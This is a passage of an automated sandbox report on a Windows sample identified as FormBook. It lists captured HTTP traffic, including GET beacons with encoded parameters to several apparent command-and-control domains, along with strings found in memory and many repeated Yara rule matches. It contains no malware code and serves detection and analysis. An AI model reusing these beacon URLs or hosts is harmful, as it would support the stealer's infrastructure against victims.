68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 2
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 27 Oct 2021 17:14:36 GMTContent-Type: text/htmlContent-Length: 169Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.1</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 884Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Virus/Spyware Download Bloc
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 27 Oct 2021 17:15:07 GMTContent-Type: text/htmlContent-Length: 275ETag: "61797039-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpString found in binary or memory: https://pepabo.com/
          Source: cscript.exe, 0000000A.00000002.560650988.0000000004DC2000.00000004.00020000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
          Source: unknownDNS traffic detected: queries for: www.isshinn1.com
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa HTTP/1.1Host: www.isshinn1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE HTTP/1.1Host: www.rdoi.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg HTTP/1.1Host: www.megacinema.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE HTTP/1.1Host: www.passiverewardssystems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 HTTP/1.1Host: www.sosoon.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE HTTP/1.1Host: www.24000words.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ HTTP/1.1Host: www.healthyweekendtips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ HTTP/1.1Host: www.thedusi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: CtTYTpaAKA.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
